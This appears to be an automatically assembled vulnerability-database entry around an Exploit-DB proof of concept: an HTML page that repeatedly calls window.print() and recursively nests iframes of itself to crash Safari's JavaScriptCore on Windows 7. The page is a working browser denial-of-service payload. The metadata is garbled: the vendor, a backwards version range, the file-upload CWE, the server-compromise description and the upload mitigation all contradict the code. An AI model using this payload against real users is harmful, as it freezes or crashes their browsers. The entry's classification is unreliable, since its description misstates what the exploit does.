Vendor: Windows 7
By: Mathias Karlsson
CVSS: 8.8 (HIGH)
CWE: 434 (Unrestricted File Upload)
Product Name: Windows 7
Affected Version From: 5.31.22.7
Affected Version To: 5.31.22.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows 7
2020

Crash Report

This exploit allows an attacker to upload a malicious file to a vulnerable server. The malicious file is then executed on the server, allowing the attacker to gain access to the server. The exploit is triggered by setting the iframe src property to an external document containing the window.print() command, so that the user does not have to dismiss the first print popup.

Mitigation:

Ensure that all file uploads are properly validated and restricted to only allow files of the expected type and size.
Source

Exploit-DB raw data:

<html>

<---------------------
Crash Report

  Problem Event Name:   APPCRASH
  Application Name:     Safari.exe
  Application Version:  5.31.22.7
  Application Timestamp:        4b8f94fa
  Fault Module Name:    JavaScriptCore.dll
  Fault Module Version: 5.31.22.5
  Fault Module Timestamp:       4b8cb88c
  Exception Code:       c00000fd
  Exception Offset:     000889f7
  OS Version:   6.1.7600.2.0.0.256.48
  Locale ID:    1053
  Additional Information 1:     d4bb
  Additional Information 2:     d4bb5342a8501f1ef1ad79845414ed25
  Additional Information 3:     57f4
  Additional Information 4:     57f4717a3dd18c61a213b49009cb5bb7

Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/

Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.

---------------------->

<script>
window.print();
a();
function a()
{
        setInterval(b,0);
}
function b()
{
        var c = document.createElement("iframe");
        c.setAttribute("src",document.location);
        document.getElementsByTagName("body")[0].appendChild(c);
        setInterval(a,0);
}
</script>
</html>